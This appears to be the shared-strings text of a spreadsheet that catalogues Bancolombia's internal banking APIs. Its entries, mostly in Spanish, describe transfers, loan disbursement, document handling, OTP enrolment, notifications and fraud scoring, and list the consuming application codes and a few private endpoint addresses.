    <t>Esta API permite a los consumidores, consultar la información de los movimientos de las cuentas de plazos fijos</t>
  </si>
  <si>
    <t>Deposit Account</t>
  </si>
  <si>
    <t>Deposit Account - Transfers</t>
  </si>
  <si>
    <t>El API  permitirá realizar las operaciones de transacciones monetarias de las Cuentas de Ahorro/Corrientes de un cliente Bancolombia y cuenta con las siguientes operaciones: -	acreditarCuenta -	debitarCuenta -	anularCredito -	anular Débito -	transferirFondosEntreCuentas -	anularTransferenciaFondosEntreCuenta</t>
  </si>
  <si>
    <t>AfectacionMonetariaDepositos/V1.0</t>
  </si>
  <si>
    <t>Recargas_AW1300001 _x000D_
 Transfiya_NU0017001 _x000D_
 CDT_AW1078001 _x000D_
 Recargas_AW1300001 _x000D_
 PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Deposit File Processing</t>
  </si>
  <si>
    <t>Deposit File Processing - Notification</t>
  </si>
  <si>
    <t>deposit-file-processing-notification</t>
  </si>
  <si>
    <t>Esta API permite a los diferentes sistemas de Bancolombia, enviar un mensaje de notificación al aplicativo Finacle Recaudos de que se le ha dejado en un FileSystem un archivo para que lo pueda procesar, realizando la notificación a una aplicación que se le ha dejado un archivo de lotes en una ruta especificada, con el fin de que la aplicación lo tome y lo procese.</t>
  </si>
  <si>
    <t>ProcesamientoArchivosDepositos/V1.0</t>
  </si>
  <si>
    <t>PODEM01_NU0001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Deposit Files Processing - Permission</t>
  </si>
  <si>
    <t>deposit-file-processing-permission</t>
  </si>
  <si>
    <t>Esta API permite a los diferentes sistemas de Bancolombia solicitar que se autorice a un perfil de usuario sobre un archivo existente en una ruta ifs del iSeries.</t>
  </si>
  <si>
    <t>Transversales iSeries</t>
  </si>
  <si>
    <t>SolicitudDeAutorizacion/V1.0</t>
  </si>
  <si>
    <t>Deposits Design</t>
  </si>
  <si>
    <t>Deposits Design - Catalogs</t>
  </si>
  <si>
    <t>deposits-design-catalogs</t>
  </si>
  <si>
    <t>habilita la consulta de los catálogos pertenecientes a depósitos. permitirá a los consumidores consultar datos de referencia que se comportan como catálogos.</t>
  </si>
  <si>
    <t>ConsultaCatalogosDepositos/V1.0</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000D_
 BC_Monitoreo_ProductorConsumidor_Depositos _x000D_
 APP_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Desembolso Credito</t>
  </si>
  <si>
    <t>capacidad que permiten la creación de obligaciones crediticias y diversas formas de disponibilidad de sus recursos.</t>
  </si>
  <si>
    <t>Desembolso Credito A La Mano</t>
  </si>
  <si>
    <t>El servicio permite realizar la creación de la obligación en el sistema Bankvision e inmediatamente después acreditar la cuenta del cliente.</t>
  </si>
  <si>
    <t>ELIBOM _x000D_
AW0856</t>
  </si>
  <si>
    <t>Desembolso Credito Consumo</t>
  </si>
  <si>
    <t>El servicio permite realizar el desembolso de un crédito de consumo otorgado a una persona natural, creando la obligación en el sistema de créditos de Bankvision y realizando el abono de dinero a la cuenta especificada para el cliente.</t>
  </si>
  <si>
    <t>AW0937 _x000D_
ELIBOM _x000D_
AW0856</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio DesembolsoCreditoConsumo permite realizar el desembolso de un crédito de consumo otorgado a una persona natural, creando la obligación en el sistema de créditos de Bankvision y realizando el abono de dinero a la cuenta especificada para el cliente.
Aunque el servicio desde el punto de vista del proveedor (STI – Bankvision) esté desarrollado para permitir desembolsar cualquier tipo de crédito, en el presente servicio se acotará únicamente a los campos necesarios para realizar el desembolso de un crédito de consumo. Este servicio adoptará a nivel de desarrollo la nueva funcionalidad creada en bróker (ConsumerMediatorSTI) para habilitar rápidamente consumos sin necesidad de hacer un desarrollo completo.
</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
ELIBOM _x000D_
AW1285001 _x000D_
AW0856 _x000D_
AW1313 _x000D_
AW0955 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Digital Document</t>
  </si>
  <si>
    <t>Digital Document - Documents</t>
  </si>
  <si>
    <t>digital-document-documents</t>
  </si>
  <si>
    <t>Esta API permite a los consumidores que tienen limitantes para consumir directamente la API de contribución documental realizar la generación y firma de documentos a través de un componente de cadena</t>
  </si>
  <si>
    <t>Digitalizacion De Documentos</t>
  </si>
  <si>
    <t>El servicio DigitalizacionDeDocumentos, es una funcionalidad que expone el aplicativo de Servicios de Información Digital KOFAX para el procesamiento de un documento representado en forma digital bajo codificación base64</t>
  </si>
  <si>
    <t xml:space="preserve">
KOFAX – Herramienta de captura_AW1108001</t>
  </si>
  <si>
    <t>AW1011 _x000D_
AW1203001</t>
  </si>
  <si>
    <t>AW0638 _x000D_
AW1011 _x000D_
NU0034001 _x000D_
AW1203001</t>
  </si>
  <si>
    <t>Consumer Loan Sufi</t>
  </si>
  <si>
    <t>Disbursement</t>
  </si>
  <si>
    <t>disbursement</t>
  </si>
  <si>
    <t>Esta API permitirá acceder a las operaciones relacionadas con el desembolso de una obligación, acción que se ejecuta luego de un estudio de crédito para cualquier tipo de producto de Sufi</t>
  </si>
  <si>
    <t>Wompi_NU0093001 _x000D_
 DesembolsosSufi_AW1097001 _x000D_
 BotonRecaudoWompi_NU0093001</t>
  </si>
  <si>
    <t>AW1097001 _x000D_
 NU0093001 _x000D_
 DesembolsosSufi_AW1097001 _x000D_
 Monitoreo_AW1097001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Disponibilidad Divisas</t>
  </si>
  <si>
    <t>El servicio Disponibilidad Divisas tiene como objetivo realizar funcionalidades para la verificación de si es un horario hábil o no para la compra y venta de divisas en CIB.</t>
  </si>
  <si>
    <t>AW1011</t>
  </si>
  <si>
    <t>Distribucion Tarjeta Debito</t>
  </si>
  <si>
    <t>Este servicio permitirá la distribución a los clientes e inventarios de tarjetas débito (plásticos). Realizar operaciones que comprendan la distribución de estas y el manejo en los inventarios de las mismas, para las sucursales o para los operadores logísticos.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1128</t>
  </si>
  <si>
    <t>Document Management</t>
  </si>
  <si>
    <t>Document Management - Digital Signature</t>
  </si>
  <si>
    <t>document-management-digital-signature</t>
  </si>
  <si>
    <t>La API Document Management - Digital Signature una vez se tenga la firma digital y el estampado cronológico de los documentos por parte del cliente se realizará la contribución o carga de dichos archivos directamente al Gestor Documental del Banco (WCC)..   NOTA: Para el caso de esta Api los endpoint a utilizar son los siguientes: Para tráfico interno: https://172.25.192.70:58012. Para trafico Cloud: https://172.25.87.4:58012.</t>
  </si>
  <si>
    <t>EASYHOME_NU0004001 _x000D_
 EDPYME_AW1170 _x000D_
 ConfirmacionOpCadena_NU0127001 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 LoansOffer_NU0102001 _x000D_
 BIZAGIBEG_AW1176001</t>
  </si>
  <si>
    <t>Document Management - Digitalization</t>
  </si>
  <si>
    <t>document-management-digitalization</t>
  </si>
  <si>
    <t>El API DigitalizacionDeDocumentos, permite el procesamiento de un documento representado en forma digital, extrayendo la data allí­ incluida. NOTA: Para el caso de esta Api los endpoint a utilizar son los siguientes: Para tráfico interno: https://172.25.192.70:59098. Para trafico Cloud: https://172.25.87.4:59098.</t>
  </si>
  <si>
    <t>Document Service</t>
  </si>
  <si>
    <t>Document Service - Customer Documents</t>
  </si>
  <si>
    <t>document-service-customer-documents</t>
  </si>
  <si>
    <t>Permite a los consumidores realizar consultas, para determinar la existencia o no de documentos al interior del grupo Bancolombia y así­ evitar, solicitarles a los clientes estos documentos de forma duplicada. El servicio está pensado para mostrarle a los consumidores información relevante sobre los documentos tales como: tipo del documento, subtipo del documento, dueí±o del documento, fecha de indexación del documento entre otros, adicionalmente permite elegir la opción de visualizar o no un link donde los documentos consultados pueden ser descargados, este servicio devuelve 0 o muchos documentos de acuerdo a los filtros que se realicen sobre este</t>
  </si>
  <si>
    <t>ConsultaMetadataDocumental/V1.0</t>
  </si>
  <si>
    <t>PODEM01_NU0001 _x000D_
 AdquirenciaCargaMasiva_NU0142001</t>
  </si>
  <si>
    <t>Document Service - Documents Catalog</t>
  </si>
  <si>
    <t>document-service-documents-catalog</t>
  </si>
  <si>
    <t>Permite a los consumidores realizar la consulta de los documentos o formatos almacenados en WCC para iniciar un proceso por parte del cliente en el banco, la adquisición de un producto o bien sea recuperar los documentos del cliente para un proceso o producto especí­fico.</t>
  </si>
  <si>
    <t>RecuperarCatalogo_BB2/V1.0</t>
  </si>
  <si>
    <t>Document Service Data</t>
  </si>
  <si>
    <t>Document Service Data - Files Information</t>
  </si>
  <si>
    <t>document-service-data-files-information</t>
  </si>
  <si>
    <t>La API permite centralizar, para los diferentes canales que originan y manejan documentos, el tráfico y su recepción sobre el componente de recepción documental.</t>
  </si>
  <si>
    <t>PODEM01_NU0001</t>
  </si>
  <si>
    <t>Document Service Data - Process Data</t>
  </si>
  <si>
    <t>document-service-data-process-data</t>
  </si>
  <si>
    <t>El servicio Consulta Datos Documentos Proceso, tiene como objetivo Consultar los datos lí­quidos de un proceso especí­fico como una nota crédito, nota débito, etc.</t>
  </si>
  <si>
    <t>Ejecutar Transferencia Externa</t>
  </si>
  <si>
    <t>Desde la sucursal virtual, el cliente puede efectuar transferencias externas desde una cuenta (ahorros ó corriente) a otros bancos o a otras filiales de Bancolombia en el exterior diferentes a la filial de la cuenta origen de la transferencia</t>
  </si>
  <si>
    <t>Ejecutar Transferencia Interna</t>
  </si>
  <si>
    <t>Permitir realizar transferencias en línea entre las cuentas corrientes y de Ahorros de una misma filial del grupo Bancolombia en el exterior.</t>
  </si>
  <si>
    <t>Electronic Promissory Note</t>
  </si>
  <si>
    <t>Electronic Promissory Note - Management</t>
  </si>
  <si>
    <t>electronic-promissory-note-management</t>
  </si>
  <si>
    <t>Capacidad que permite la firma del titulo valor electrónico con las mismas caracterí­sticas de un pagaré fí­sico en cuanto a seguridad, veracidad jurí­dica, contenido y obligación de la promesa.</t>
  </si>
  <si>
    <t>GestionPagareElectronico/V1.0
GestionarPagareElectronico/V1.0</t>
  </si>
  <si>
    <t>Document Service Sufi</t>
  </si>
  <si>
    <t>Electronic Signature</t>
  </si>
  <si>
    <t>electronic-signature</t>
  </si>
  <si>
    <t>Esta API ofrece a tus aplicaciones la posibilidad de poder realizar una firma digital a partir de un código generado por el cliente</t>
  </si>
  <si>
    <t>VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000D_
 VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000D_
 Monitoreo_AW1378001 _x000D_
 MONSUFI_AW1378001</t>
  </si>
  <si>
    <t>Electronic Signature - Simple Signature</t>
  </si>
  <si>
    <t>electronic-signature-simple-signature</t>
  </si>
  <si>
    <t>Permite a los consumidores realizar el proceso de firma de un documento por un íºnico firmante retornando el documento firmado al finalizar el proceso.</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 BNPL_NU0287001</t>
  </si>
  <si>
    <t>Eliminar Usuario</t>
  </si>
  <si>
    <t>Permitir eliminar cualquier usuario de la Sucursal Virtual para que no pueda utilizar el canal</t>
  </si>
  <si>
    <t>Email Notifications</t>
  </si>
  <si>
    <t>Email Notifications - Send Email Message</t>
  </si>
  <si>
    <t>email-notifications-send-email-message</t>
  </si>
  <si>
    <t>Permite el enví­o de correos electronicos personalizables mediante una plantilla HTML</t>
  </si>
  <si>
    <t>EnvioCorreoElectronico/V1.0</t>
  </si>
  <si>
    <t>Portal Contenidos Bancolombia_AW1218001 _x000D_
 GestionaNegocios_AW1302001 _x000D_
 EDPYME_AW1170 _x000D_
 APM_AW1097001 _x000D_
 Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000D_
 HistoriaCliente_NU0090001 _x000D_
 PortalAutogestionPyme_AW1287 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 EASYHOME_NU0004001 _x000D_
 LoansApproval_NU107001 _x000D_
 HabitatAdministraciones_NU0113001 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 HabitatCore_AW1281003 _x000D_
 HABITATCONST_NU0013001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 Inversi_NU0160001 _x000D_
 BIZAGIBEG_AW1176001 _x000D_
 NETWORKING_NU0046001 _x000D_
 BNPL_NU0287001 _x000D_
 PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>Enrolar Cliente OTP</t>
  </si>
  <si>
    <t>Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”. Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores, (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1170 _x000D_
NU0004001 _x000D_
AW1185001</t>
  </si>
  <si>
    <t>Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”.   Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores,  (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)</t>
  </si>
  <si>
    <t>Enrollment</t>
  </si>
  <si>
    <t>Enrollment - Users Management</t>
  </si>
  <si>
    <t>enrollment-user-management</t>
  </si>
  <si>
    <t>API para el manejo de enrolamiento.</t>
  </si>
  <si>
    <t>Carventuri _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>enrollment-users-management</t>
  </si>
  <si>
    <t>CarventuriApiVehiculos_AW1097001 _x000D_
 PuntoAliadoApiVehiculos_AW1097001</t>
  </si>
  <si>
    <t>Enterprises Loans</t>
  </si>
  <si>
    <t>Enterprises Loans - Utilities</t>
  </si>
  <si>
    <t>enterprises-loans-utilities</t>
  </si>
  <si>
    <t xml:space="preserve">Por medio de esta API el banco enví­a en lí­nea y masivamente a Bancoldex  un paquete de solicitudes de redescuento que pasan por todas las validaciones necesarias, como la disponibilidad de recursos de la lí­nea de crédito de la entidad de redescuento, las condiciones financieras de cada solicitud y de control previo sobre el beneficiario de crédito. </t>
  </si>
  <si>
    <t>BIZAGIACJCN_AW1285001 _x000D_
 APP_AW1294001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Enviar Codigo Seguridad OTP</t>
  </si>
  <si>
    <t xml:space="preserve">Realizar el envió del código de Seguridad al cliente, a través del componente de alertas._x005F_x000D_ </t>
  </si>
  <si>
    <t>Enviar Notificacion</t>
  </si>
  <si>
    <t>Servicio para envio de Alertas y Notificacion por correo electronico o mensaje de texto al dispositivo celular, sobre cualquier proceso que se realice en el banco por parte del cliente y sea controlado por un consumidor en específico.</t>
  </si>
  <si>
    <t>AW1208001 _x000D_
AW0937 _x000D_
AW0922 _x000D_
AW0856 _x000D_
AW1097001 _x000D_
AW0638 _x000D_
AW1142001 _x000D_
TP</t>
  </si>
  <si>
    <t>Enviar Recordatorio Usuario</t>
  </si>
  <si>
    <t>Permite recordar al cliente E-banking el usuario para el ingresar a la plataforma Sucursal Empresas y Personas y deberá ser enviarlo a través del Componente de Alertas al cliente. (Delivery System).</t>
  </si>
  <si>
    <t>Envio Alertas Y Notificaciones</t>
  </si>
  <si>
    <t>Este servicio permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así el cliente no las haya configurado.  Este servicio invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el iseries.</t>
  </si>
  <si>
    <t>AW1170 _x000D_
NU0014001 _x000D_
NU0100001 _x000D_
NU0019001 _x000D_
AW1300001 _x000D_
AW0955 _x000D_
NU0103001 _x000D_
DEVELOPSOATEST _x000D_
NU0147001 _x000D_
NU0094001 _x000D_
AW0955001 _x000D_
AW1435001 _x000D_
AW1315001 _x000D_
AW1404002 _x000D_
NU0154001 _x000D_
AW1277001 _x000D_
NU0034001 _x000D_
NU0106001</t>
  </si>
  <si>
    <t>Envio Correo Electronico</t>
  </si>
  <si>
    <t>El servicio de EnvioCorreoElectronico consta de las siguientes funcionalidades:  - Envío correo electrónico con un contenido básico. - Envío correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo adjunte al mensaje. - Envío correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo proteja con contraseña y lo adjunte al mensaje. - Envío correo electrónico con adjunto pdf generado por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. - Envío correo electrónico con adjunto pdf generado y protegido con clave por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. - Envío correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique y lo adjunte como pdf en el mensaje. - Envío correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique, lo proteja con clave y lo adjunte como pdf en el mensaje.</t>
  </si>
  <si>
    <t>Masivia</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1177 _x000D_
AW0937 _x000D_
AW1070 _x000D_
AW1285001 _x000D_
AW1373 _x000D_
AW0407 _x000D_
AW1313 _x000D_
AW1097001 _x000D_
AW1272001 _x000D_
AW0398 _x000D_
AW1206001 _x000D_
AW0360007 _x000D_
AW1170 _x000D_
AW1287001 _x000D_
AW1277001 _x000D_
AW1302001 _x000D_
NU0100001 _x000D_
NU107001 _x000D_
NU0004001 _x000D_
AW1315001 _x000D_
AW1128 _x000D_
NU0090001 _x000D_
AW1281003 _x000D_
BIZ _x000D_
AW0360009 _x000D_
AW1172001 _x000D_
AW1287 _x000D_
DEVELOPSOATEST _x000D_
NU0035001 _x000D_
AW1151001 _x000D_
AW1218001 _x000D_
NU0034001 _x000D_
AW1185001 _x000D_
NU0010001 _x000D_
NU0143001 _x000D_
AW1176 _x000D_
NU0013001 _x000D_
NU0170001 _x000D_
NU0113001 _x000D_
AW0660 _x000D_
NU0102001 _x000D_
NU0046001 _x000D_
AW1299001 _x000D_
AW1281002 _x000D_
NU0137001</t>
  </si>
  <si>
    <t>Envio Correo Electronico Todo1</t>
  </si>
  <si>
    <t>El presente servicio permite realizar el envío de correo electrónico básico (sin adjuntos) a través del proveedor Todo1. Dichos correos corresponden a los generados por Alertas y Notificaciones que se encuentra en Iseries. Dichas alertas son generadas dada la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes.
Su principal función será recibir la trama plana que entrega Iseries para transformarla y entregar al proveedor la estructura solicitada por el mismo.</t>
  </si>
  <si>
    <t>AW0407 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Envio Data Liquida Persona</t>
  </si>
  <si>
    <t>Este servicio tiene como objetivo recibir la data líquida que Kofax obtuvo de la lectura de una imagen de un documento (cédula, pasaporte, cédula de extranjería).</t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW1108001</t>
  </si>
  <si>
    <t>Envio Mensajeria Movil</t>
  </si>
  <si>
    <t>El servicio permite realizar el envío de mensajería móvil. Está enfocado a consumidores que tienen la necesidad de realizar envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, donde deba establecerse comunicación con los clientes.</t>
  </si>
  <si>
    <t>Envio Metadata Documental</t>
  </si>
  <si>
    <t>El servicio tiene como alcance el envio de metadata para el proceso de estudio de crédito de consumo originada en bizagi.</t>
  </si>
  <si>
    <t>AW0922 _x000D_
AW1108001</t>
  </si>
  <si>
    <t>Envio Notificacion Push</t>
  </si>
  <si>
    <t>Como mecanismos de envío de Alertas y Notificaciones, se tendrán 3 posibilidades, Correo Electrónico, SMS y Notificaciones Push. Para el envío de Notificaciones Push, es necesario que el usuario previamente se haya enrolado en el sistema mediante la APP Personas y se haya actualizado la base de PCC Alertas y Notificaciones para habilitar el envío por este medio. Con esta habilitación, el sistema de Alertas y Notificaciones en Iseries, podrá hacer uso de este servicio que permitirá enviar la información necesaria al Gestor de Envío para enviar la Notificación Push al teléfono del usuario.</t>
  </si>
  <si>
    <t>NU0100001 _x000D_
ISPCC0002</t>
  </si>
  <si>
    <t>Envio Sms Inalambria</t>
  </si>
  <si>
    <t>Este servicio está enfocado a consumidores transaccionales que realizan envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes.</t>
  </si>
  <si>
    <t>PCC - Programas Comunes Canales_SMS Inalambria_ISPCC0011</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1177 _x000D_
AW0937 _x000D_
AW1285001 _x000D_
AW0856 _x000D_
AW1373 _x000D_
AW0407 _x000D_
AW1313 _x000D_
AW1097001 _x000D_
NU0109001 _x000D_
AW1316001 _x000D_
AW0360007 _x000D_
AW1287001 _x000D_
AW1235002 _x000D_
NU0100001 _x000D_
NU107001 _x000D_
NU0004001 _x000D_
AW1315001 _x000D_
AW1287 _x000D_
AW1286001 _x000D_
AW1128 _x000D_
AW1081001 _x000D_
AW0157 _x000D_
AW0939001 _x000D_
NU0010001 _x000D_
DEVELOPSOATEST _x000D_
AW0955001 _x000D_
AW1185001 _x000D_
AW1313001 _x000D_
AW0214001 _x000D_
AW1151001</t>
  </si>
  <si>
    <t>Envio Sms Redeban</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite realizar el envío de SMS a través del proveedor Redeban. Dichos mensajes corresponden principalmente a los generados por Alertas y Notificaciones que se encuentra en Iseries. Dichas alertas son generadas dada la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes.
Su función será recibir la trama plana que entrega Iseries para transformarla y entregar al proveedor la estructura XML para el envío del SMS. Por lo tanto no es reusable para otros proyectos.
El envío se hace uno a uno.
</t>
  </si>
  <si>
    <t>Estudio Credito Consumo</t>
  </si>
  <si>
    <t>El servicio habilita el análisis de un determinado cliente con el fin de evaluar cuales productos de crédito de consumo se le pueden otorgar.</t>
  </si>
  <si>
    <t>APM_AW1081001</t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW1285001 _x000D_
AW0856 _x000D_
AW1011 _x000D_
APICONNECT _x000D_
PRODUCTORCONSUMIDOR _x000D_
AW1299001 _x000D_
AW0955001</t>
  </si>
  <si>
    <t>Factoring - Obligations</t>
  </si>
  <si>
    <t>factoring-obligations</t>
  </si>
  <si>
    <t>El Api permite a los consumidores obtener el listado de todas las operaciones u obligaciones de Factoring que tenga un cliente, sean de descuento de facturas o lí­nea triangular y con información detallada de cada obligación</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001 _x000D_
 APP_AW1294001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Fiduciary Agreement</t>
  </si>
  <si>
    <t>Fiduciary Agreement - Information</t>
  </si>
  <si>
    <t>fiduciary-agreement-information</t>
  </si>
  <si>
    <t>Esta API permitirá a los consumidores consultar la información básica de los acuerdos fiduciarios, las cuentas y terceros de los acuerdos fiduciarios</t>
  </si>
  <si>
    <t>Fiduciary_Pdn _x000D_
 ModuloNegociosFiduciarios_NU0247001</t>
  </si>
  <si>
    <t>Fiduciary Payment Order</t>
  </si>
  <si>
    <t>Fiduciary Payment Order - Information</t>
  </si>
  <si>
    <t>fiduciary-payment-order-information</t>
  </si>
  <si>
    <t>Permite consultar y validar información de las ordenes de pago, ya que esta permite consultar el listado de pagos, validar si están duplicados o si son extemporaneos</t>
  </si>
  <si>
    <t>FiduciaryPaymentOrderInformation_NU0325001 _x000D_
 FiduciaryPaymentOrderInformation_NU0325001 _x000D_
 FiduciaryPaymentOrderInformation_NU0325001 _x000D_
 FiduciaryPaymentOrderInformation_NU0325001 _x000D_
 ModuloNegociosFiduciarios_NU0247001</t>
  </si>
  <si>
    <t>Filter Captcha</t>
  </si>
  <si>
    <t>Filtro funcional de captcha, consumiendo los servicios de Google y Huawei</t>
  </si>
  <si>
    <t>Loans Study Vehicle</t>
  </si>
  <si>
    <t>Final Study</t>
  </si>
  <si>
    <t>final-study</t>
  </si>
  <si>
    <t>El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual.</t>
  </si>
  <si>
    <t>VentasDigitalesSufi_NU0037 _x000D_
 MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 VentasDigitalesSufiVehiculos_AW1097001 _x000D_
 MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>Fixed Deposit Account</t>
  </si>
  <si>
    <t>Fixed Deposit Account - Balances</t>
  </si>
  <si>
    <t>fixed-deposit-account-balances</t>
  </si>
  <si>
    <t>La API Fixed Deposit Account  Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de forma detallada para los tipos de productos TDA: Plazos fijos que se posee en las Filiales del Exterior.</t>
  </si>
  <si>
    <t>ConsultaSaldosPlazosFijos/V1.0</t>
  </si>
  <si>
    <t>TMP1 johucorr_AW0360010 _x000D_
 App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>Fixed Deposit Account - Frequency</t>
  </si>
  <si>
    <t>fixed-deposit-account-frequency</t>
  </si>
  <si>
    <t xml:space="preserve">Capacidad que  permite realizar la consulta de las posibles periodicidades en el pago de  intereses de una inversión virtual, segíºn el plazo máximo impuesto por el producto.  </t>
  </si>
  <si>
    <t>ConsultaPeriodicidad/V1.0</t>
  </si>
  <si>
    <t>CGC_NU0014001 _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 SVPSucursalVirtualPersonas_NU0149001 _x000D_
 ALM_AW0955001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Fixed Deposit Account - Management</t>
  </si>
  <si>
    <t>fixed-deposit-account-management</t>
  </si>
  <si>
    <t>Api que permite al cliente realizar la simulación, renovar o desactivar la inversión virtual</t>
  </si>
  <si>
    <t>GestionInversiones/V1.0</t>
  </si>
  <si>
    <t>Fixed Deposit Account -Accounts</t>
  </si>
  <si>
    <t>fixed-deposit-account-accounts</t>
  </si>
  <si>
    <t xml:space="preserve">El API tiene como propósito ofrecer distintas capacidades de consulta relacionadas con los productos de inversión virtual, entre ellos:  - realizar la consultas de tasas de la Inversión Virtual  de acuerdo a las condiciones ingresadas por el cliente.   - Consultar las inversion virtuales que se encuentran activas de un cliente  - Consultar el detalle de una inversion virtual en particular </t>
  </si>
  <si>
    <t>ConsultaInversiones/V1.0</t>
  </si>
  <si>
    <t>Fraud</t>
  </si>
  <si>
    <t>Fraud - Monitoring</t>
  </si>
  <si>
    <t>fraud-monitoring</t>
  </si>
  <si>
    <t>El api **Fraud - Monitoring** permite realizar un monitoreo antifraude para las transacciones realizadas por un cliente Bancolombia.   El api cuenta con la Operación **"Transferences/actions/analyze":**   Dicha operación permite obtener un puntaje de riesgo del cliente al momento de ejecutar una transacción por medio de Bancolombia.   En caso de ser un puntaje negativo, el proceso transaccional realiza sus respectivas.   El api debe ser consumido con todos sus campos debidamente diligenciados, para que pueda realizar su monitoreo exitosamente y devolver el puntaje de riesgo en el campo "**riskScore**", de lo contrario dará una respuesta indicando que los campos deben ser diligenciados correctamente.</t>
  </si>
  <si>
    <t>fraud evaluation</t>
  </si>
  <si>
    <t>Fraud evaluation - Fraud monitoring</t>
  </si>
  <si>
    <t>fraud-evaluation-fraud-monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio evalíºa el riesgo de una transacción en modo sí­ncrono, aplicando sobre la misma los filtros definidos en el ámbito de monitoreo transaccional, es decir, reglas que validen condiciones de las transacciones, adicional, el score de riesgo que SAS FM (herramienta que responde el score a Thanos) genera de acuerdo al perfil transaccional del cliente. Esta api también permitirá a los canales usar análisis comportamental para identificar riesgos de una transacción del cliente con base en el comportamiento que este tenga en los dispositivos que usa </t>
  </si>
  <si>
    <t>Monitoreo y Transversales</t>
  </si>
  <si>
    <t>Hair Alexander Morales</t>
  </si>
